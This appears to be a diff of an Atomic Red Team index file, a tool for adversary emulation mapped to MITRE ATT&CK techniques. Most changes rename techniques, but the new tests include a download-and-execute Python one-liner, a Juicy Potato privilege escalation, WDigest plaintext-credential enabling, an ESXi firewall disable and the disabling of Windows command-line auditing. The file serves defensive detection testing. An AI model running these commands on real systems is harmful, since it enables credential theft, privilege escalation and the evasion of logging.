      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -28995,6 +28996,7 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
    atomic_tests: []
  T1609:
    technique:
@@ -30298,7 +30300,8 @@ execution:
          which_python=$(which python || which python3 || which python3.9 || which python2)
          $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
        name: sh
-        cleanup_command: "rm #{payload_file_name} \n"
+        cleanup_command: "rm #{payload_file_name} \npip-autoremove pypykatz >nul 2>
+          nul\n"
    - name: Execute Python via scripts
      auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
      description: Create Python file (.py) that downloads and executes shell script
@@ -31987,7 +31990,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -32062,6 +32065,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -35883,7 +35887,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -35935,6 +35939,7 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
+      identifier: T1137.001
    atomic_tests: []
  T1546.009:
    technique:
@@ -41841,6 +41846,7 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
    atomic_tests: []
  T1219:
    technique:
@@ -43803,7 +43809,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -43825,6 +43831,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -1580,7 +1580,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -1655,6 +1655,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -9414,7 +9415,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -26925,6 +26926,7 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
    atomic_tests: []
  T1609:
    technique:
@@ -29166,7 +29168,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -29241,6 +29243,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -32832,7 +32835,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -32884,6 +32887,7 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
+      identifier: T1137.001
    atomic_tests: []
  T1546.009:
    technique:
@@ -38525,6 +38529,7 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
    atomic_tests: []
  T1219:
    technique:
@@ -40460,7 +40465,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -40482,6 +40487,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -1264,7 +1264,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -1339,6 +1339,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -24017,6 +24018,7 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
    atomic_tests: []
  T1609:
    technique:
@@ -26194,7 +26196,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -26269,6 +26271,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -29543,7 +29546,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -29595,6 +29598,7 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
+      identifier: T1137.001
    atomic_tests: []
  T1546.009:
    technique:
@@ -34853,6 +34857,7 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
    atomic_tests: []
  T1219:
    technique:
@@ -36463,7 +36468,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36485,6 +36490,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -1264,7 +1264,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -1339,6 +1339,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -23836,6 +23837,7 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
    atomic_tests: []
  T1609:
    technique:
@@ -26013,7 +26015,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -26088,6 +26090,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
    atomic_tests: []
  T1574.011:
    technique:
@@ -29362,7 +29365,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -29414,6 +29417,7 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
+      identifier: T1137.001
    atomic_tests: []
  T1546.009:
    technique:
@@ -34621,6 +34625,7 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
    atomic_tests: []
  T1219:
    technique:
@@ -36231,7 +36236,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36253,6 +36258,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -684,6 +684,35 @@ defense-evasion:
          copy #{exe_to_launch} not_an_scr.scr
          rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
        cleanup_command: del not_an_scr.scr
+    - name: Running DLL with .init extension and function
+      auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
+      description: |
+        This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
+        DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_file:
+          description: The DLL file to be called
+          type: string
+          default: PathToAtomicsFolder\T1218.011\bin\_WT.init
+        dll_url:
+          description: The URL to the DLL file that must be downloaded
+          type: url
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
+      dependency_executor_name: powershell
+      dependencies:
+      - description: The DLL file to be called must exist at the specified location
+          (#{dll_file})
+        prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+      executor:
+        command: 'rundll32.exe #{dll_file},krnl
+
+          '
+        name: command_prompt
  T1027.009:
    technique:
      modified: '2023-09-29T21:14:57.263Z'
@@ -2318,7 +2347,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -2393,7 +2422,24 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
-    atomic_tests: []
+      identifier: T1542.001
+    atomic_tests:
+    - name: UEFI Persistence via Wpbbin.exe File Creation
+      auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+      description: |
+        Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+        - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+        - http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+        - https://github.com/tandasat/WPBT-Builder
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: "echo \"Creating %systemroot%\\wpbbin.exe\"      \nNew-Item -ItemType
+          File -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        cleanup_command: "echo \"Removing %systemroot%\\wpbbin.exe\" \nRemove-Item
+          -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        elevation_required: true
  T1574.011:
    technique:
      modified: '2023-03-30T21:01:38.651Z'
@@ -8589,6 +8635,48 @@ defense-evasion:
          '
        name: command_prompt
        elevation_required: true
+    - name: ESXi - Disable Firewall via Esxcli
+      auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a
+      description: 'Adversaries may disable the ESXI firewall via ESXCLI
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m
+          PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_disable_firewall.txt\n"
+        cleanup_command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password}
+          -m PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_enable_firewall.txt\n"
+        name: command_prompt
+        elevation_required: false
  T1553.003:
    technique:
      x_mitre_platforms:
@@ -9381,6 +9469,24 @@ defense-evasion:
          '
        name: command_prompt
        elevation_required: true
+    - name: Use Powershell to Modify registry to store logon credentials
+      auto_generated_guid: 68254a85-aa42-4312-a695-38b7276307f8
+      description: |
+        Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
+        Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Set-ItemProperty -Force -Path  ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
+          -Name  ''UseLogonCredential'' -Value ''1'' -ErrorAction Ignore
+
+          '
+        cleanup_command: 'Set-ItemProperty -Force -Path  ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
+          -Name  ''UseLogonCredential'' -Value ''0'' -ErrorAction Ignore
+
+          '
+        name: powershell
+        elevation_required: true
    - name: Add domain to Trusted sites Zone
      auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
      description: |
@@ -14437,6 +14543,53 @@ defense-evasion:
          '
        name: powershell
        elevation_required: true
+    - name: Juicy Potato
+      auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
+      description: "This Atomic utilizes Juicy Potato to obtain privilege escalation.
+        \nUpon successful execution of this test, a vulnerable CLSID will be used
+        to execute a process with system permissions.\nThis tactic has been previously
+        observed in SnapMC Ransomware, amongst numerous other campaigns. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)"
+      supported_platforms:
+      - windows
+      input_arguments:
+        potato_path:
+          description: Path to the JuicyPotato.exe file
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe
+        listening_port:
+          description: COM server listen port
+          type: integer
+          default: 7777
+        target_exe:
+          description: Target executable to launch with system privileges
+          type: path
+          default: "$env:windir\\system32\\notepad.exe"
+        target_CLSID:
+          description: Vulnerable CLSID to impersonate privileges
+          type: string
+          default: "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'JuicyPotato.exe must exist on disk
+
+          '
+        prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+      executor:
+        command: 'cmd /c ''#{potato_path}'' -l ''#{listening_port}'' -t * -p ''#{target_exe}''
+          -c ''#{target_CLSID}''
+
+          '
+        cleanup_command: |
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+        name: powershell
+        elevation_required: true
  T1205.001:
    technique:
      x_mitre_platforms:
@@ -14734,7 +14887,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -14819,7 +14972,68 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      identifier: T1562.003
-    atomic_tests: []
+    atomic_tests:
+    - name: Disable Windows Command Line Auditing using reg.exe
+      auto_generated_guid: 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
+          Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          echo Commencing Attack - Disabling Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          echo Commencing Cleanup - Restoring Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
+    - name: Disable Windows Command Line Auditing using Powershell Cmdlet
+      auto_generated_guid: 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
+          Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+        https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          echo "Commencing Attack - Disabling Registry Value"
+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
+        cleanup_command: |
+          echo "Commencing Cleanup - Restoring Registry Value"
+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
  T1556.008:
    technique:
      modified: '2023-05-04T18:02:51.318Z'
@@ -32297,6 +32511,53 @@ privilege-escalation:
          '
        name: powershell
        elevation_required: true
+    - name: Juicy Potato
+      auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
+      description: "This Atomic utilizes Juicy Potato to obtain privilege escalation.
+        \nUpon successful execution of this test, a vulnerable CLSID will be used
+        to execute a process with system permissions.\nThis tactic has been previously
+        observed in SnapMC Ransomware, amongst numerous other campaigns. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)"
+      supported_platforms:
+      - windows
+      input_arguments:
+        potato_path:
+          description: Path to the JuicyPotato.exe file
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe
+        listening_port:
+          description: COM server listen port
+          type: integer
+          default: 7777
+        target_exe:
+          description: Target executable to launch with system privileges
+          type: path
+          default: "$env:windir\\system32\\notepad.exe"
+        target_CLSID:
+          description: Vulnerable CLSID to impersonate privileges
+          type: string
+          default: "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'JuicyPotato.exe must exist on disk
+
+          '
+        prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+      executor:
+        command: 'cmd /c ''#{potato_path}'' -l ''#{listening_port}'' -t * -p ''#{target_exe}''
+          -c ''#{target_CLSID}''
+
+          '
+        cleanup_command: |
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+        name: powershell
+        elevation_required: true
  T1098.001:
    technique:
      modified: '2023-10-03T17:37:24.011Z'
@@ -41288,7 +41549,49 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1059
+    atomic_tests:
+    - name: AutoIt Script Execution
+      auto_generated_guid: a9b93f17-31cb-435d-a462-5e838a2a6026
+      description: 'An adversary may attempt to execute suspicious or malicious script
+        using AutoIt software instead of regular terminal like powershell or cmd.
+        Calculator will popup when the script is executed successfully.
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AutoIt executable file must exist on disk at the specified location
+          (#{autoit_path})
+
+          '
+        prereq_command: |
+          if(Test-Path "#{autoit_path}") {
+              exit 0
+          } else {
+              exit 1
+          }
+        get_prereq_command: |
